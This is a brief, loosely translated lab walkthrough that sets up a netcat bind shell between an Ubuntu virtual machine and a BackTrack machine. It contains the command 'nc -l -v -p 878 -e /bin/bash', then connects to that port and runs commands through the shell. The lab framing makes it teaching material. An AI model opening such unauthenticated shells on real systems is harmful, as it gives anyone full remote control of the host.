oke Now we proceed
1 open ubuntu on virtualbox
2. open terminal on ubuntu
3. after tebuka terminal in ubuntu we write the following command:
    root@alex -leptop:/home/alexDesktop/cinta nc # nc -l -v -p 878 -e /bin/bash

4. after that we write terminal command in ubuntuthen we open a terminal in backtrack and 
     writecommands:
    #  nc 192.168.43.129 878

5.after connection of ubuntu and backtrack alreadyso can we can test by using the command
   # ls
6.then we can look at the processes runningdiubuntu with the command:
   #ps ax 
7. then please select the process and then wait untilthe process complete
